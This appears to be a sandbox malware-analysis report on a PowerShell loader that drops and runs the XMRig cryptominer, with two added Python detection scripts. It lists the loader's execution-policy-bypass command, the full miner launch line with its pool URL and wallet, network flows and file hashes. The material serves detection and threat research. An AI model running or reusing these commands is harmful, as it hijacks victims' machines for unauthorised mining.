memory/4552-68-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-69-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-70-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-71-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-72-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-73-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-74-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-75-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-76-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-77-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-78-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-79-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-80-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-81-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-82-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-83-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-84-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-85-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-86-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-87-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-88-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-89-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-90-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-91-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-92-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-93-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-94-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-95-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-96-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-97-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-98-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-99-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-100-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-101-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-102-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-103-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-104-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-105-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-106-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-107-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-108-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-109-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-110-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-111-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-112-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-113-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-114-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-115-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-116-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-117-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-118-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted 2024-05-26 13:33

Reported 2024-05-27 06:34

Platform win10v2004-20240508-en

Max time kernel 1799s

Max time network 1763s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 indicator rows, all N/A N/A N/A N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

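The two command lines listed above are identical in every behavioral analysis on this page: a PowerShell loader run with `-ExecutionPolicy bypass` on a script in the user's Temp directory, followed by xmrig started with `-a rx` (RandomX), `-o stratum+ssl://rx.unmineable.com:443` and an unMineable-style `-u COIN:address.worker` user field. The following is an added example, not code from the sandbox report or from XMRig, that turns such process-creation records into detection-ready fields: it tokenizes a Windows command line, extracts pool host/port, transport, algorithm, coin, wallet and worker, and flags the loader pattern. The records, pids and the benign notepad entry are constructed for the example; the two real command lines are copied from this page.

```python
"""Added example for this page (not code from the sandbox report or from XMRig):
parse the PowerShell loader and xmrig launch lines into detection-ready fields.
Records are constructed from the page's Processes entries; the pids and the
benign notepad record are illustrative."""
import re
from urllib.parse import urlsplit

SAMPLE_EVENTS = [  # constructed; command lines 1 and 2 are copied from the report
    {"pid": 1932,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"'},
    {"pid": 1904,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x'},
    {"pid": 4100, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\Admin\Desktop\notes.txt"},
]

_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')

def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted spans whole."""
    return [quoted or bare for quoted, bare in _TOKEN_RE.findall(cmdline)]

# xmrig's pool-related switches, short and long form; '--flag=value' is also accepted.
XMRIG_FLAGS = {"-o": "url", "--url": "url", "-u": "user", "--user": "user",
               "-p": "pass", "--pass": "pass", "-a": "algo", "--algo": "algo"}

def parse_xmrig_args(tokens):
    """Collect url/user/pass/algo from an xmrig-style argument list (tokens[0] is the exe)."""
    opts, i = {}, 1
    while i < len(tokens):
        flag, sep, inline_val = tokens[i].partition("=")
        if sep and flag in XMRIG_FLAGS:
            opts[XMRIG_FLAGS[flag]] = inline_val
            i += 1
        elif tokens[i] in XMRIG_FLAGS and i + 1 < len(tokens):
            opts[XMRIG_FLAGS[tokens[i]]] = tokens[i + 1]
            i += 2
        else:
            i += 1
    return opts

def miner_profile(tokens):
    """Pool host/port, transport, algo, coin, wallet and worker from a stratum launch, else None."""
    opts = parse_xmrig_args(tokens)
    url = opts.get("url", "")
    if not url.lower().startswith("stratum+"):
        return None
    pool = urlsplit(url)                      # urlsplit accepts the stratum+ssl scheme
    # unMineable's user field is COIN:address.worker[#ref]; the address never contains '.'
    wallet, _, worker = opts.get("user", "").partition(".")
    coin, has_coin, address = wallet.partition(":")
    return {"transport": pool.scheme, "pool_host": pool.hostname, "pool_port": pool.port,
            "algo": opts.get("algo"), "coin": coin if has_coin else None,
            "wallet": address if has_coin else wallet,
            "worker": worker.partition("#")[0] or None}

def _has_bypass(tokens):
    """'-ExecutionPolicy Bypass', including abbreviations PowerShell accepts (-ep, -ex, ...)."""
    low = [t.lower() for t in tokens]
    for i, t in enumerate(low[:-1]):
        abbreviated = t == "-ep" or (len(t) >= 3 and "-executionpolicy".startswith(t))
        if abbreviated and low[i + 1] == "bypass":
            return True
    return False

def _script_arg(tokens):
    """Value of -File (or an abbreviation of it), if present."""
    low = [t.lower() for t in tokens]
    for i, t in enumerate(low[:-1]):
        if len(t) >= 2 and "-file".startswith(t):
            return tokens[i + 1]
    return None

def classify(event):
    """(finding, detail) pairs for one process-creation record."""
    tokens = tokenize(event["cmdline"])
    findings = []
    if event["image"].lower().endswith("\\powershell.exe") and _has_bypass(tokens):
        script = _script_arg(tokens)
        if script and "\\appdata\\local\\temp\\" in script.lower():
            findings.append(("powershell_bypass_temp_script", script))
    profile = miner_profile(tokens)
    if profile:
        findings.append(("xmrig_stratum_launch", profile))
        if profile["transport"] == "stratum+ssl" and profile["pool_port"] == 443:
            # TLS to a pool on 443 looks like HTTPS to a port-based egress filter.
            findings.append(("pool_on_https_port", f"{profile['pool_host']}:443"))
    return findings

def triage(events):
    """pid -> findings, for every record that produced at least one."""
    return {e["pid"]: hits for e in events if (hits := classify(e))}

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        for name, detail in hits:
            print(pid, name, detail)
```

The wallet and worker are the fields worth pivoting on: the same `XMR:...` address and `unmineable_worker_vilqtiac` worker recur across every detonation here, so they identify the operator across otherwise unrelated hosts, whereas the xmrig.exe hash only identifies a stock 6.21.3 release build.
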
Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp
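
Read in order, the Network tables on this page show the same staging sequence each time: a lookup and TLS connection to github.com, a download from objects.githubusercontent.com (GitHub's release-asset CDN, where the xmrig-6.21.3 build comes from), and then a long-lived TLS connection to rx.unmineable.com on 443. The in-addr.arpa rows are the sandbox's PTR lookups of addresses already contacted and add no destination. The following is an added example, not part of the sandbox report, that correlates flow records into a "release download, then pool connection" detection per host. The flow records are constructed from the behavioral15 table; the timestamps, host names and the control host WS-02 are invented because the report records none of them, and the pool-domain list holds only the domain this page shows.

```python
"""Added example for this page (not from the sandbox report): correlate flow
records into a 'GitHub release download, then mining-pool connection' detection.
Flows are constructed from the behavioral15 Network table; timestamps, host
names and the WS-02 control host are invented."""
from datetime import datetime

# Pool domains taken from the report's stratum URL; a real deployment keeps a longer list.
POOL_DOMAIN_SUFFIXES = ("unmineable.com",)
RELEASE_CDN = "objects.githubusercontent.com"   # GitHub release assets: the staging source above

def _flow(ts, host, proto, dst, domain):
    return {"ts": datetime.fromisoformat(ts), "host": host, "proto": proto, "dst": dst, "domain": domain}

SAMPLE_FLOWS = [  # constructed; WS-01 mirrors the report, WS-02 only downloads from GitHub
    _flow("2024-05-26T13:34:00", "WS-01", "udp", "8.8.8.8:53", "github.com"),
    _flow("2024-05-26T13:34:01", "WS-01", "tcp", "20.26.156.215:443", "github.com"),
    _flow("2024-05-26T13:34:01", "WS-01", "udp", "8.8.8.8:53", "objects.githubusercontent.com"),
    _flow("2024-05-26T13:34:02", "WS-01", "tcp", "185.199.108.133:443", "objects.githubusercontent.com"),
    _flow("2024-05-26T13:34:19", "WS-01", "udp", "8.8.8.8:53", "rx.unmineable.com"),
    _flow("2024-05-26T13:34:20", "WS-01", "tcp", "161.35.34.195:443", "rx.unmineable.com"),
    _flow("2024-05-26T13:40:00", "WS-02", "tcp", "185.199.108.133:443", "objects.githubusercontent.com"),
]

def is_pool_domain(domain):
    """Suffix match on a label boundary, so 'notunmineable.com' does not match."""
    d = (domain or "").lower().rstrip(".")
    return any(d == s or d.endswith("." + s) for s in POOL_DOMAIN_SUFFIXES)

def pool_connections(flows):
    """TCP flows whose resolved name is a known pool, whatever the port (443 here)."""
    return [f for f in flows if f["proto"] == "tcp" and is_pool_domain(f.get("domain"))]

def staged_miner_hosts(flows, window_seconds=300):
    """Hosts that fetched a GitHub release asset and reached a pool within the window.

    A GitHub download on its own is normal; the pair, in this order and close
    together, is the staging sequence the report shows.
    """
    by_host = {}
    for f in sorted(flows, key=lambda f: f["ts"]):
        by_host.setdefault(f["host"], []).append(f)
    hits = {}
    for host, host_flows in by_host.items():
        downloads = [f["ts"] for f in host_flows
                     if f["proto"] == "tcp" and f.get("domain") == RELEASE_CDN]
        for pf in pool_connections(host_flows):
            prior = [t for t in downloads if 0 <= (pf["ts"] - t).total_seconds() <= window_seconds]
            if prior:
                hits[host] = {"pool_domain": pf["domain"], "pool_dst": pf["dst"],
                              "download_ts": max(prior), "pool_ts": pf["ts"],
                              "seconds_after_download": int((pf["ts"] - max(prior)).total_seconds())}
                break
    return hits

if __name__ == "__main__":
    for host, hit in staged_miner_hosts(SAMPLE_FLOWS).items():
        print(host, hit["pool_dst"], hit["pool_domain"], hit["seconds_after_download"], "s after download")
```

Because the pool traffic is stratum over TLS to port 443, a port-based egress rule will not separate it from ordinary HTTPS; the domain from DNS or the TLS SNI, together with the sequence above, is what distinguishes it.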

Files

memory/2772-0-0x00007FFC401D3000-0x00007FFC401D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jpzzehcz.xp4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2772-10-0x000001ADFE270000-0x000001ADFE292000-memory.dmp

memory/2772-11-0x00007FFC401D0000-0x00007FFC40C91000-memory.dmp

memory/2772-12-0x00007FFC401D0000-0x00007FFC40C91000-memory.dmp

memory/2772-14-0x00007FFC401D0000-0x00007FFC40C91000-memory.dmp

memory/2772-16-0x000001ADFE2C0000-0x000001ADFE2CA000-memory.dmp

memory/2772-15-0x000001ADFEA00000-0x000001ADFEA12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:51

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pjmroa15.4re.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:53

Platform

win7-20240215-en

Max time kernel

1559s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Network

N/A

Files

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:29

Platform

win11-20240419-en

Max time kernel

1799s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3j2qs10.osf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:34

Platform

win7-20240221-en

Max time kernel

1563s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Network

N/A

Files

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:58

Platform

win10v2004-20240508-en

Max time kernel

1789s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
